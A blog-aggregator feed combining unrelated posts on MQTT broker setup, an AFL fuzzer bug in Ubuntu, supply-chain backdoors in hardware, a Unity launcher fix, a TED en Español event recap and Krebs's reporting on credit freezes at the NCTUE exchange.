Before all of that I need to get the basics in place. This is the first in a series of posts about putting together the right building blocks to allow some useful level of home automation / central control. The first step is working out how to glue everything together. A few years back someone told me MQTT was the way forward for IoT applications, being more lightweight than a RESTful interface and thus better suited to small devices. At the time I wasn’t convinced, but it seems they were right and MQTT is one of the more popular ways of gluing things together.

I found the HiveMQ series on MQTT Essentials to be a pretty good intro; my main takeaway was that MQTT allows for a single message broker to enable clients to publish data and multiple subscribers to consume that data. TLS is supported for secure data transfer and there’s a whole bunch of different brokers and client libraries available. The use of a broker is potentially helpful in dealing with firewalling; clients and subscribers only need to talk to the broker, rather than requiring any direct connection.

With all that in mind I decided to set up a broker to play with the basics. I made the decision that it should run on my OpenWRT router - all the devices I want to hook up can easily see that device, and if it’s down then none of them are going to be able to get to a broker hosted anywhere else anyway. I’d seen plenty of info about Mosquitto and it’s already in the OpenWRT package repository. So I sorted out a Let’s Encrypt cert, installed Mosquitto and created a couple of test users:

opkg install mosquitto-ssl
mosquitto_passwd -b /etc/mosquitto/mosquitto.users user1 foo
mosquitto_passwd -b /etc/mosquitto/mosquitto.users user2 bar
chown mosquitto /etc/mosquitto/mosquitto.users
chmod 600 /etc/mosquitto/mosquitto.users

I then edited /etc/mosquitto/mosquitto.conf and made sure the following are set. In particular you need cafile set in order to enable TLS:

port 8883
cafile /etc/ssl/lets-encrypt-x3-cross-signed.pem
certfile /etc/ssl/mqtt.crt
keyfile /etc/ssl/mqtt.key

log_dest syslog

allow_anonymous false

password_file /etc/mosquitto/mosquitto.users
acl_file /etc/mosquitto/mosquitto.acl

Finally I created /etc/mosquitto/mosquitto.acl with the following:

user user1
topic readwrite #

user user2
topic read ro/#
topic readwrite test/#

That gives me user1 who has full access to everything, and user2 with readonly access to the ro/ tree and read/write access to the test/ tree.

To test everything was working I installed mosquitto-clients on a Debian test box and in one window ran:

mosquitto_sub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -v -t '#' -u user1 -P foo

and in another:

mosquitto_pub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -t 'test/message' -m 'Hello World!' -u user2 -P bar

(without the --capath it’ll try a plain TCP connection rather than TLS, and not produce a useful error message) which resulted in the mosquitto_sub instance outputting:

test/message Hello World!

Trying:

mosquitto_pub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -t 'test2/message' -m 'Hello World!' -u user2 -P bar

resulted in no output due to the ACL preventing it. All good and ready to actually make use of - of which more later.
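For programmatic use, the mosquitto_sub test above translates to only a few lines with the Python paho-mqtt library (my choice for illustration, written against its 1.x API that was current at the time; adjust the host, credentials and CA bundle path to your setup):

import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
    print("Connected with result code", rc)
    client.subscribe("test/#")              # subscribe once the connection is up

def on_message(client, userdata, msg):
    print(msg.topic, msg.payload.decode())  # handle anything published to matching topics

client = mqtt.Client()
client.username_pw_set("user1", "foo")
client.tls_set("/etc/ssl/certs/ca-certificates.crt")   # CA bundle so the broker cert is verified
client.on_connect = on_connect
client.on_message = on_message
client.connect("mqtt-host", 8883)
client.loop_forever()                       # blocks, dispatching callbacks as messages arrive

Publishing is just as short: connect the same way and call client.publish("test/message", "Hello World!").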

Planet DebianDaniel Stender: AFL in Ubuntu 18.04 is broken

As has been reported on the discussion list for American Fuzzy Lop lately, the fuzzer is unfortunately broken in Ubuntu 18.04 “Bionic Beaver”. Ubuntu Bionic ships AFL 2.52b, which is the current version at the moment of writing this blog post. The particular problem comes from the accompanying gcc-7 package, which is pulled in by afl via the build-essential package. It was noticed through continuous integration in the development branch for the next Debian release (#895618) that introducing a triplet-prefixed as in gcc-7 7.3.0-16 (the same was changed for gcc-8, see #895251) affected the -B option in such a way that afl-gcc (the gcc wrapper) can no longer use the shipped assembler (/usr/lib/afl-as) to install the instrumentation into the target binary (#896057, thanks to Jakub Wilk for spotting the problem). As a result, instrumented fuzzing and other things in afl don’t work:

$ afl-gcc --version
 afl-cc 2.52b by <lcamtuf@google.com>
 gcc (Ubuntu 7.3.0-16ubuntu3) 7.3.0
$ afl-gcc -o test-instr test-instr.c 
 afl-cc 2.52b by <lcamtuf@google.com>
$ afl-fuzz -i in -o out -- ./test-instr
 afl-fuzz 2.52b by <lcamtuf@google.com>
 [+] You have 2 CPU cores and 1 runnable tasks (utilization: 50%).
 [+] Try parallel jobs - see /usr/share/doc/afl-doc/docs/parallel_fuzzing.txt.
 [*] Creating hard links for all input files...
 [*] Validating target binary...
 
 [-] Looks like the target binary is not instrumented! The fuzzer depends on
     compile-time instrumentation to isolate interesting test cases while
     mutating the input data. For more information, and for tips on how to
     instrument binaries, please see /usr/share/doc/afl-doc/docs/README.
	 
     When source code is not available, you may be able to leverage QEMU
     mode support. Consult the README for tips on how to enable this.
     (It is also possible to use afl-fuzz as a traditional, "dumb" fuzzer.
     For that, you can use the -n option - but expect much worse results.)
	 
 [-] PROGRAM ABORT : No instrumentation detected
          Location : check_binary(), afl-fuzz.c:6920

The same error message is put out e.g. by afl-showmap. gcc-7 7.3.0-18 fixes this. As an alternative until that becomes available, afl-clang, which uses the clang compiler, can be used instead to prepare the target binary properly:

$ afl-clang --version
 afl-cc 2.52b by <lcamtuf@google.com>
 clang version 4.0.1-10 (tags/RELEASE_401/final)
$ afl-clang -o test-instr test-instr.c 
 afl-cc 2.52b by <lcamtuf@google.com>
 afl-as 2.52b by <lcamtuf@google.com>
 [+] Instrumented 6 locations (64-bit, non-hardened mode, ratio 100%)

CryptogramSupply-Chain Security

Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users.

It's a legitimate fear, and perhaps a prudent action. But it's just one instance of the much larger issue of securing our supply chains.

All of our computerized systems are deeply international, and we have no choice but to trust the companies and governments that touch those systems. And while we can ban a few specific products, services or companies, no country can isolate itself from potential foreign interference.

In this specific case, the Pentagon is concerned that the Chinese government demanded that ZTE and Huawei add "backdoors" to their phones that could be surreptitiously turned on by government spies or cause them to fail during some future political conflict. This tampering is possible because the software in these phones is incredibly complex. It's relatively easy for programmers to hide these capabilities, and correspondingly difficult to detect them.

This isn't the first time the United States has taken action against foreign software suspected to contain hidden features that can be used against us. Last December, President Trump signed into law a bill banning software from the Russian company Kaspersky from being used within the US government. In 2012, the focus was on Chinese-made Internet routers. Then, the House Intelligence Committee concluded: "Based on available classified and unclassified information, Huawei and ZTE cannot be trusted to be free of foreign state influence and thus pose a security threat to the United States and to our systems."

Nor is the United States the only country worried about these threats. In 2014, China reportedly banned antivirus products from both Kaspersky and the US company Symantec, based on similar fears. In 2017, the Indian government identified 42 smartphone apps that China subverted. Back in 1997, the Israeli company Check Point was dogged by rumors that its government added backdoors into its products; other of that country's tech companies have been suspected of the same thing. Even al-Qaeda was concerned; ten years ago, a sympathizer released the encryption software Mujahedeen Secrets, claimed to be free of Western influence and backdoors. If a country doesn't trust another country, then it can't trust that country's computer products.

But this trust isn't limited to the country where the company is based. We have to trust the country where the software is written -- and the countries where all the components are manufactured. In 2016, researchers discovered that many different models of cheap Android phones were sending information back to China. The phones might be American-made, but the software was from China. In 2016, researchers demonstrated an even more devious technique, where a backdoor could be added at the computer chip level in the factory that made the chips -- without the knowledge of, and undetectable by, the engineers who designed the chips in the first place. Pretty much every US technology company manufactures its hardware in countries such as Malaysia, Indonesia, China and Taiwan.

We also have to trust the programmers. Today's large software programs are written by teams of hundreds of programmers scattered around the globe. Backdoors, put there by we-have-no-idea-who, have been discovered in Juniper firewalls and D-Link routers, both of which are US companies. In 2003, someone almost slipped a very clever backdoor into Linux. Think of how many countries' citizens are writing software for Apple or Microsoft or Google.

We can go even farther down the rabbit hole. We have to trust the distribution systems for our hardware and software. Documents disclosed by Edward Snowden showed the National Security Agency installing backdoors into Cisco routers being shipped to the Syrian telephone company. There are fake apps in the Google Play store that eavesdrop on you. Russian hackers subverted the update mechanism of a popular brand of Ukrainian accounting software to spread the NotPetya malware.

In 2017, researchers demonstrated that a smartphone can be subverted by installing a malicious replacement screen.

I could go on. Supply-chain security is an incredibly complex problem. US-only design and manufacturing isn't an option; the tech world is far too internationally interdependent for that. We can't trust anyone, yet we have no choice but to trust everyone. Our phones, computers, software and cloud systems are touched by citizens of dozens of different countries, any one of whom could subvert them at the demand of their government. And just as Russia is penetrating the US power grid so they have that capability in the event of hostilities, many countries are almost certainly doing the same thing at the consumer level.

We don't know whether the risk of Huawei and ZTE equipment is great enough to warrant the ban. We don't know what classified intelligence the United States has, and what it implies. But we do know that this is just a minor fix for a much larger problem. It's doubtful that this ban will have any real effect. Members of the military, and everyone else, can still buy the phones. They just can't buy them on US military bases. And while the US might block the occasional merger or acquisition, or ban the occasional hardware or software product, we're largely ignoring that larger issue. Solving it borders on somewhere between incredibly expensive and realistically impossible.

Perhaps someday, global norms and international treaties will render this sort of device-level tampering off-limits. But until then, all we can do is hope that this particular arms race doesn't get too far out of control.

This essay previously appeared in the Washington Post.

Planet DebianAndreas Metzler: balance sheet snowboarding season 2017/18

For a change, a winter with snow again, allowing an early start to the season (December 2). Due to early Easter (lifts closing), the last run was on April 14. The amount of snow would have allowed boarding for at least another two weeks. (Today, on May 10, mountainbiking is still curtailed; routes above 1650 meters of altitude are not yet rideable.)

OTOH the weather sucked: extended periods of stable sunny weather were rare and totally absent in February and the first half of March - I only had 3 days on piste in February. I made many kilometres luging during that time. ;-)

Anyway here it is:

season    (partial) days  Damüls  Diedamskopf  Warth/Schröcken  total altitude (m)  highscore (m)  # of runs
2005/06               25      10           15                0              124634          10247        309
2006/07               17      10            4                3               74096           8321        189
2007/08               29       5           24                0              219936          12108        503
2008/09               37      10           23                4              226774          11272        551
2009/10               30      16           13                1              202089          11888        462
2010/11               30      23            4                3              203918          10976        449
2011/12               25      10           14                1              228588          13076        516
2012/13               23       4           19                0              203562          13885        468
2013/14               30      29            1                0              274706          12848        597
2014/15               24       9           13                2              224909          13278        530
2015/16               17       4           12                1              138037          11015        354
2016/17               30       4           23                3              269819          12245        634
2017/18               29       8           19                2              266158          11116        616

Worse Than FailureCodeSOD: A Quick Replacement

Lucio Crusca was doing a bit of security auditing when he found this pile of code, and it is indeed a pile. It is PHP, which doesn’t automatically make it bad, but it makes use of a feature of PHP so bad that they’ve deprecated it in recent versions: the create_function method.

Before we even dig into this code, the create_function method takes a string, runs eval on it, and returns the name of the newly created anonymous function. Prior to PHP 5.3.0 this was their method of doing lambdas. And while the function is officially deprecated as of PHP 7.2.0… it’s not removed. You can still use it. And I’m sure a lot of code probably still does. Like this block…

        public static function markupToPHP($content) {
                if ($content instanceof phpQueryObject)
                        $content = $content->markupOuter();
                /* <php>...</php> to <?php...? > */
                $content = preg_replace_callback(
                        '@<php>\s*<!--(.*?)-->\s*</php>@s',
                        array('phpQuery', '_markupToPHPCallback'),
                        $content
                );
                /* <node attr='< ?php ? >'> extra space added to save highlighters */
                $regexes = array(
                        '@(<(?!\\?)(?:[^>]|\\?>)+\\w+\\s*=\\s*)(\')([^\']*)(?:&lt;|%3C)\\?(?:php)?(.*?)(?:\\?(?:&gt;|%3E))([^\']*)\'@s',
                        '@(<(?!\\?)(?:[^>]|\\?>)+\\w+\\s*=\\s*)(")([^"]*)(?:&lt;|%3C)\\?(?:php)?(.*?)(?:\\?(?:&gt;|%3E))([^"]*)"@s',
                );
                foreach($regexes as $regex)
                        while (preg_match($regex, $content))
                                $content = preg_replace_callback(
                                        $regex,
                                        create_function('$m',
                                                'return $m[1].$m[2].$m[3]."<?php "
                                                        .str_replace(
                                                                array("%20", "%3E", "%09", "&#10;", "&#9;", "%7B", "%24", "%7D", "%22", "%5B", "%5D"),
                                                                array(" ", ">", "       ", "\n", "      ", "{", "$", "}", \'"\', "[", "]"),
                                                                htmlspecialchars_decode($m[4])
                                                        )
                                                        ." ?>".$m[5].$m[2];'
                                        ),
                                        $content
                                );
                return $content;
        }

From what I can determine from the comments and the code, this is taking some arbitrary content in the form <php>PHP CODE HERE</php> and converting it to <?php PHP CODE HERE ?>. I don’t know what happens after this function is done with it, but I’m already terrified.

The inner loop fascinates me. while (preg_match($regex, $content)) implies that we need to call the replace function multiple times, but preg_replace_callback by default replaces all instances of the matching regex, so there’s absolutely no reason for the while loop. Then, of course, there’s the use of create_function, which is itself a WTF, but it’s also worth noting that there’s no need to do this dynamically: you could just as easily have declared a callback function like they did above with _markupToPHPCallback.

Lucio adds:

I was looking for potential security flaws: well, I’m not sure this is actually exploitable, because even black hats have limited patience!

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

,

Planet DebianEddy Petrișor: "Where does Unity store its launch bar items?" or "Convincing Ubuntu's Unity 7.4.5 to run the newer version of PyCharm when starting from the launcer"

I have been driving a System76 Oryx-Pro for some time now. And I am running Ubuntu 16.04 on it.
I typically try to avoid polluting global name spaces, so any apps I install from source I tend to install under a versioned directory under ~/opt, for instance, PyCharm Community Edition 2016.3.1 is installed under ~/opt/pycharm-community-2016.3.1.

Today, after Pycharm suggested I install a newer version, I downloaded the current package, and ran it, as instructed in the embedded readme.txt, via the wrapper script:
~/opt/pycharm-community-2018.1.2/bin$ ./pycharm.sh
Everything looked OK, but when wanting to lock the icon on the launch bar I realized Unity did not display a separate Pycharm Community Edition icon for the 2018.1.2 version, but showed the existing icon as active.

"I guess it's the same filename, so maybe unity confuses the older version with the new one, so I have to replace the launcher to user the newer version by default", I said.

So I closed the interface, removed the PyCharm Community Edition launcher, restarted the newer PyCharm from the command line, locked the icon, closed PyCharm once more, then clicked on the launcher bar.

Surprise! Unity was launching the old version! What?!

Repeated the entire series of steps, suspecting some PEBKAC, but was surprised to see the same result.

"Damn! Unity is stupid! I guess is a good thing they decided to kill it!", I said to myself.

Well, it shouldn't be that hard to find the offending item, so I started to grep in ~/.config, then in ~/.* for the string "PyCharm Cummunity Edition" without success.
Hmm, I guess the Linux world copied a lot of bad ideas from the Windows world: the configs are probably not in ~/.* in plain text, but in that simulacrum of a Windows registry called dconf. So I installed dconf-editor and searched once more for the keyword "Community", but only found one entry, in the gedit filebrowser context.

So where does Unity get its launch bar items from? Since there is no "Properties" entry in the context menu and I didn't want to try to debug the startup of my graphical environment, and since Unity is open source, I had to look at the sources.

After some fighting with dead links to unity.ubuntu.com subpages, then searching for "git repository Ubuntu Unity", I realized Ubuntu loves Bazaar, so I searched for "bzr Ubuntu Unity repository" - no luck. Luckily, Wikipedia usually has those kinds of links, and I found the damn thing.

BTW, am I the only one considering some strong hits with a clue bat for developers who name projects after some generic term that has no chance of overriding the typical meaning in common parlance, such as "Unity" or "Repo"?

Finding the sources and looking a little at the repository did not make it clear what the entry point was. I was expecting that at least the README or the INSTALL file would give some relevant hints on the config or the initialization. My patience was running dry.

Maybe looking on my own system would be a better approach?
eddy@feodora:~$ which unity
/usr/bin/unity
eddy@feodora:~$ ll $(which unity)
-rwxr-xr-x 1 root root 9907 feb 21 21:38 /usr/bin/unity*
eddy@feodora:~$ ^ll^file
file $(which unity)
/usr/bin/unity: Python script, ASCII text executable
BINGO! This is a Python script, not a binary, in spite of the many .cpp sources in the Unity tree.

I opened the file with less, then found this interesting bit:
 def reset_launcher_icons ():
    '''Reset the default launcher icon and restart it.'''
    subprocess.Popen(["gsettings", "reset" ,"com.canonical.Unity.Launcher" , "favorites"])
Great! So it stores that stuff in the pseudo-registry, but I have to look under com.canonical.Unity.Launcher.favorites. Firing up dconf-editor again, I found the relevant bit in the value of that key:
'application://jetbrains-pycharm-ce.desktop'
So where is this .desktop file? I guess using find is going to bring it up:
find /home/eddy/.local/ -name jetbrains* -exec vi {} \;
It did, and the content made it obvious what was happening:
[Desktop Entry]
Version=1.0
Type=Application
Name=PyCharm Community Edition
Icon=/home/eddy/opt/pycharm-community-2016.3.1/bin/pycharm.png
Exec="/home/eddy/opt/pycharm-community-2016.3.1/bin/pycharm.sh" %f

Comment=The Drive to Develop
Categories=Development;IDE;
Terminal=false
StartupWMClass=jetbrains-pycharm-ce
Probably Unity did not create a new desktop file when locking the icon: it simply checked whether the jetbrains-pycharm-ce.desktop file already existed in my ~/.local directory, saw that it did, and so skipped recreating it.

Just as somebody said, all difficult computer science problems are either caused by leaky abstractions or by caching. I guess here we have some sort of caching issue, but it is easy to fix - just edit the file:
eddy@feodora:~$ cat /home/eddy/.local/share/applications/jetbrains-pycharm-ce.desktop

[Desktop Entry]
Version=1.0
Type=Application
Name=PyCharm Community Edition
Icon=/home/eddy/opt/pycharm-community-2018.1.2/bin/pycharm.png
Exec="/home/eddy/opt/pycharm-community-2018.1.2/bin/pycharm.sh" %f
Comment=The Drive to Develop
Categories=Development;IDE;
Terminal=false
StartupWMClass=jetbrains-pycharm-ce
I checked the startup again, and now the expected splash screen appears. GREAT!

I wonder whether this is a Unity issue, or whether it is due to some broken library that could affect other desktop environments such as MATE, GNOME or XFCE?

"Only" lost 2 hours (including this post) with this stupid bug, so I can go back to what I was trying in the first place, but now is already to late, so I have to go to sleep.

Planet DebianShirish Agarwal: A random collection of thoughts

First of all, a couple of weeks back I was able to put out an article about riot-web. It had been on my mind for a month or more, hence I finally sat down and wrote and re-wrote it a few times to make it simpler for newbies to follow.

One thing I did miss sharing was the Debian matrix page. The other thing which was needling me was the comment. This is not the first time I have heard that complaint about riot-web, and at times I have had it happen to me as well.

The thing is, it’s always an issue for me when to write about something, and how to say whether something is mature or not, as software in general has a tendency to fail at any given point in time.

For such queries I haven’t the foggiest idea as to what to share as the only debug mode is if you have built riot from source and run the -debug tests but can’t say that to a newbie.

One of the things which I didn’t mention is if any researchers tried to get data out of riot-web because AFAIK twitter banned lot of researchers who were trying to get data out of their platform to do analytics etc.

I was reminded of this as I had read an open letter a couple of days earlier by researchers raising independent oversight of Facebook as a concern as well.

It would have been interesting if there were any new studies made of the riot-web implementation, something similar to a study of IRC I read some years ago. The mathematical observations were above my head, but some of the observations were still interesting to say the least.

There is another pattern I have been seeing in the newer decentralized free software services. While in theory the reference implementation is supposed to be one of many, many times it becomes the de facto implementation; otherwise you have the IRC way, where each client just added features willy-nilly but still somehow managed to stay sane and interoperate over the years - but that’s a different story altogether for a different day.

While I like the latter, it can be hard, as migration from one client to another is a huge headache irrespective of what the content is. There is, or could be, data loss or even metadata loss, and you may come to know only years later (if you are ‘lucky’) what info it is that you lost.

The easiest example is contacts migration. Most professionals have at least a hundred or two hundred contacts; now if a few go missing during migration, either from one version to another or from one platform to another, they have neither the time nor the skills to figure out why the migration partly succeeded and the rest didn’t. Of course there is a whole industry of migration experts who can write code with all the hooks to make sure that the migration works smoothly, or to point out what was not migrated.

These services are wholly commercial in nature, and one cannot know in advance how good or bad the service is, as issues usually come to bite much later.

On another note altogether, I have been watching the Java confusion from a distance. There’s a Mars Sims project I have been following for quite some time; I made a few bug reports and, for reasons unknown, was eventually made a contributor. They are also in a flux as to what to do. I had read lists.debian.org/debian-java off and on on the web and was glad to point out the correct links.

I had read the rumors some time back that Oracle was bull-charging Java so that it would be the only provider in town and almost everybody would have to come to it for support rather than any other provider. I can’t prove it one way or the other, as it’s just a rumor, but it does seem to make sense.

At the end, I remember a comment made by the DD Praveen at a minidebconf which happened a month ago. It was about how upstreams are somewhat discouraging of Debian practices, and specifically of Debian Policy. This has been discussed somewhat threadbare in the thread “What can Debian do to provide complex applications to its users?” on debian-devel. The short history I know is that minified javascript does and can have security issues; see this comment in the same thread as well as the related point shared in Debian Policy. Even Praveen’s reply in the thread is pretty illuminating.

As a user I recommend Debian to my friends, clients because of the stability as well as security tracker but with upstreams in a sort of non-cooperative mood it just adds that much more responsibility to DD’s than before.

The non-cooperation can also be seen in something like PR, for instance like the one which was done by andrewshadura and that is somewhat sad 😦

TEDTED en Español: TED’s first-ever Spanish-language speaker event in NYC

Host Gerry Garbulsky opens the TED en Español event in the TEDNYC theater, New York, NY. (Photo: Dian Lofton / TED)

Thursday marked the first-ever TED en Español speaker event hosted by TED in its New York City office. The all-Spanish daytime event featured eight speakers, a musical performance, five short films and fifteen one-minute talks given by members of the audience.

The New York event is just the latest addition to TED’s sweeping new Spanish-language TED en Español initiative, designed to spread ideas to the global Hispanic community. Led by TED’s Gerry Garbulsky, also head of the world’s largest TEDx event, TEDxRiodelaPlata in Argentina, TED en Español includes a Facebook community, Twitter feed, weekly “Boletín” newsletter, YouTube channel and — as of earlier this month — an original podcast created in partnership with Univision Communications.

Should we automate democracy? “Is it just me, or are there other people here that are a little bit disappointed with democracy?” asks César A. Hidalgo. Like other concerned citizens, the MIT physics professor wants to make sure we have elected governments that truly represent our values and wishes. His solution: What if scientists could create an AI that votes for you? Hidalgo envisions a system in which each voter could teach her own AI how to think like her, using quizzes, reading lists and other types of data. So once you’ve trained your AI and validated a few of the decisions it makes for you, you could leave it on autopilot, voting and advocating for you … or you could choose to approve every decision it suggests. It’s easy to poke holes in his idea, but Hidalgo believes it’s worth trying out on a small scale. His bottom line: “Democracy has a very bad user interface. If you can improve the user interface, you might be able to use it more.”

When the focus of failure shifts from what is lost to what is gained, we can all learn to “fail mindfully,” says Leticia Gasca. (Photo: Jasmina Tomic / TED)

How to fail mindfully. If your business failed in Ancient Greece, you’d have to stand in the town square with a basket over your head. Thankfully, we’ve come a long way — or have we? Failed-business owner Leticia Gasca doesn’t think so. Motivated by her own painful experience, she set out to create a way for others like her to convert the guilt and shame of a business venture gone bad into a catalyst for growth. Thus was born “Fuckup Nights” (FUN), a global movement and event series for sharing stories of professional failure, and The Failure Institute, a global research group that studies failure and its impact on people, businesses and communities. For Gasca, when the focus of failure shifts from what is lost to what is gained, we can all learn to “fail mindfully” and see endings as doorways to empathy, resilience and renewal.

From four countries to one stage. The pan-Latin-American musical ensemble LADAMA brought much more than just music to the TED en Español stage. Inviting the audience to dance with them, Venezuelan Maria Fernanda Gonzalez, Brazilian Lara Klaus, Colombian Daniela Serna and American Sara Lucas sing and dance to a medley of rhythms that range from South American to Caribbean-infused styles. Playing “Night Traveler” and “Porro Maracatu,” LADAMA transformed the stage into a place of music worth spreading.

Gastón Acurio shares stories of the power of food to change lives. (Photo: Jasmina Tomic / TED)

World change starts in your kitchen. In his pioneering work to bring Peruvian cuisine to the world, Gastón Acurio discovered the power that food has to change peoples’ lives. As ceviche started appearing in renowned restaurants worldwide, Gastón saw his home country of Peru begin to appreciate the diversity of its gastronomy and become proud of its own culture. But food hasn’t always been used to bring good to the world. With the industrial revolution and the rise of consumerism, “more people in the world are dying from obesity than hunger,” he notes, and many peoples’ lifestyles aren’t sustainable. 
By interacting with and caring about the food we eat, Gastón says, we can change our priorities as individuals and change the industries that serve us. He doesn’t yet have all the answers on how to make this a systematic movement that politicians can get behind, but world-renowned cooks are already taking these ideas into their kitchens. He tells the stories of a restaurant in Peru that supports native people by sourcing ingredients from them, a famous chef in NYC who’s fighting against the use of monocultures and an emblematic restaurant in France that has barred meat from the menu. “Cooks worldwide are convinced that we cannot wait for others to make changes and that we must jump into action,” he says. But professional cooks can’t do it all. If we want real change to happen, Gastón urges, we need home cooking to be at the center of everything.

The interconnectedness of music and life. Chilean musical director Paolo Bortolameolli wraps his views on music within his memory of crying the very first time he listened to live classical music. Sharing the emotions music evoked in him, Bortolameolli presents music as a metaphor for life — full of the expected and the unexpected. He thinks that we listen to the same songs again and again because, as humans, we like to experience life from a standpoint of expectation and stability, and he simultaneously suggests that every time we listen to a musical piece, we enliven the music, imbuing it with the potential to be not just recognized but rediscovered.

We reap what we sow — let’s sow something different. Up until the mid-’80s, the average incomes in major Latin American countries were on par with those in Korea. But now, less than a generation later, Koreans earn two to three times more than their Latin American counterparts. How can that be? The difference, says futurist Juan Enriquez, lies in a national prioritization of brainpower — and in identifying, educating and celebrating the best minds. What if in Latin America we started selecting for academic excellence the way we would for an Olympic soccer team? If Latin American countries are to thrive in the era of technology and beyond, they should look to establish their own top universities rather than letting their brightest minds thirst for nourishment, competition and achievement — and find it elsewhere, in foreign lands.

Rebeca Hwang shares her dream of a world where identities are used to bring people together, not alienate them. (Photo: Jasmina Tomic / TED)

Diversity is a superpower. Rebeca Hwang was born in Korea, raised in Argentina and educated in the United States. As someone who has spent a lifetime juggling various identities, Hwang can attest that having a blended background, while sometimes challenging, is actually a superpower. The venture capitalist shared how her fluency in many languages and cultures allows her to make connections with all kinds of people from around the globe. As the mother of two young children, Hwang hopes to pass this perspective on to her kids. She wants to teach them to embrace their unique backgrounds and to create a world where identities are used to bring people together, not alienate them.

Marine ecologist Enric Sala wants to protect the last wild places in the ocean. (Photo: Jasmina Tomic / TED)

How we’ll save our oceans If you jumped in the ocean at any random spot, says Enric Sala, you’d have a 98 percent chance of diving into a dead zone — a barren landscape empty of large fish and other forms of marine life. As a marine ecologist and National Geographic Explorer-in-Residence, Sala has dedicated his life to surveying the world’s oceans. He proposes a radical solution to help protect the oceans by focusing on our high seas, advocating for the creation of a reserve that would include two-thirds of the world’s ocean. By safeguarding our high seas, Sala believes we will restore the ecological, economic and social benefits of the ocean — and ensure that when our grandchildren jump into any random spot in the sea, they’ll encounter an abundance of glorious marine life instead of empty space.

And to wrap it up … In an improvised rap performance with plenty of well-timed dance moves, psychologist and dance therapist César Silveyra closes the session with 15 of what he calls “nano-talks.” In a spectacular showdown of his skills, Silveyra ties together ideas from previous speakers at the event, including Enric Sala’s warnings about overfished oceans, Gastón Acurio’s Peruvian cooking revolution and even a shoutout for speaker Rebeca Hwang’s grandmother … all the while “feeling like Beyoncé.”

Geek FeminismInformal Geek Feminism get-togethers, May and June

Some Geek Feminism folks will be at the following conferences and conventions in the United States over the next several weeks, in case contributors and readers would like to have some informal get-togethers to reminisce and chat about inheritors of the GF legacy:

If you’re interested, feel free to comment below, and to take on the step of initiating open space/programming/session organizing!

CryptogramVirginia Beach Police Want Encrypted Radios

This article says that the Virginia Beach police are looking to buy encrypted radios.

Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected.

Someone should ask them if they want those radios to have a backdoor.

Krebs on SecurityThink You’ve Got Your Credit Freezes Covered? Think Again.

I spent a few days last week speaking at and attending a conference on responding to identity theft. The forum was held in Florida, one of the major epicenters for identity fraud complaints in United States. One gripe I heard from several presenters was that identity thieves increasingly are finding ways to open new mobile phone accounts in the names of people who have already frozen their credit files with the big-three credit bureaus. Here’s a look at what may be going on, and how you can protect yourself.

Carrie Kerskie is director of the Identity Fraud Institute at Hodges University in Naples. A big part of her job is helping local residents respond to identity theft and fraud complaints. Kerskie said she’s had multiple victims in her area recently complain of having cell phone accounts opened in their names even though they had already frozen their credit files at the big three credit bureaus: Equifax, Experian and Trans Union (as well as distant fourth bureau Innovis).

The freeze process is designed so that a creditor should not be able to see your credit file unless you unfreeze the account. A credit freeze blocks potential creditors from being able to view or “pull” your credit file, making it far more difficult for identity thieves to apply for new lines of credit in your name.

But Kerskie’s investigation revealed that the mobile phone merchants weren’t asking any of the four credit bureaus mentioned above. Rather, the mobile providers were making credit queries with the National Consumer Telecommunications and Utilities Exchange (NCTUE), or nctue.com.

Source: nctue.com

“We’re finding that a lot of phone carriers — even some of the larger ones — are relying on NCTUE for credit checks,” Kerskie said. “It’s mainly phone carriers, but utilities, power, water, cable, any of those, they’re all starting to use this more.”

The NCTUE is a consumer reporting agency founded by AT&T in 1997 that maintains data such as payment and account history, reported by telecommunication, pay TV and utility service providers that are members of NCTUE.

Who are the NCTUE’s members? If you call the 800-number that NCTUE makes available to get a free copy of your NCTUE credit report, the option for “more information” about the organization says there are four “exchanges” that feed into the NCTUE’s system: the NCTUE itself; something called “Centralized Credit Check Systems“; the New York Data Exchange; and the California Utility Exchange.

According to a partner solutions page at Verizon, the New York Data Exchange is a not-for-profit entity created in 1996 that provides participating exchange carriers with access to local telecommunications service arrears (accounts that are unpaid) and final account information on residential end user accounts.

The NYDE is operated by Equifax Credit Information Services Inc. (yes, that Equifax). Verizon is one of many telecom providers that use the NYDE (and recall that AT&T was the founder of NCTUE).

The California Utility Exchange collects customer payment data from dozens of local utilities in the state, and also is operated by Equifax (Equifax Information Services LLC).

Google has virtually no useful information available about an entity called Centralized Credit Check Systems. It’s possible it no longer exists. If anyone finds differently, please leave a note in the comments section.

When I did some more digging on the NCTUE, I discovered…wait for it…Equifax also is the sole contractor that manages the NCTUE database. The entity’s site is also hosted out of Equifax’s servers. Equifax’s current contract to provide this service expires in 2020, according to a press release posted in 2015 by Equifax.

RED LIGHT. GREEN LIGHT. RED LIGHT.

Fortunately, the NCTUE makes it fairly easy to obtain any records they may have on Americans.  Simply phone them up (1-866-349-5185) and provide your Social Security number and the numeric portion of your registered street address.

Assuming the automated system can verify you with that information, the system then orders an NCTUE credit report to be sent to the address on file. You can also request to be sent a free “risk score” assigned by the NCTUE for each credit file it maintains.

The NCTUE also offers an online process for freezing one’s report. Perhaps unsurprisingly, however, the process for ordering a freeze through the NCTUE appears to be completely borked at the moment, thanks no doubt to Equifax’s well documented abysmal security practices.

Alternatively, it could all be part of a willful or negligent strategy to continue discouraging Americans from freezing their credit files (experts say the bureaus make about $1 for each time they sell your file to a potential creditor).

On April 29, I had an occasion to visit Equifax’s credit freeze application page, and found that the site was being served with an expired SSL certificate from Symantec (i.e., the site would not let me browse using https://). This happened because I went to the site using Google Chrome, and Google announced a decision in September 2017 to no longer trust SSL certs issued by Symantec prior to June 1, 2016.

Google said it would do this starting with Google Chrome version 66. It did not keep this plan a secret. On April 18, Google pushed out Chrome 66.  Despite all of the advance warnings, the security people at Equifax apparently missed the memo and in so doing probably scared most people away from its freeze page for several weeks (Equifax fixed the problem on its site sometime after I tweeted about the expired certificate on April 29).

That’s because when one uses Chrome to visit a site whose encryption certificate is validated by one of these unsupported Symantec certs, Chrome puts up a dire security warning that would almost certainly discourage most casual users from continuing.

The insecurity around Equifax’s own freeze site likely discouraged people from requesting a freeze on their credit files.

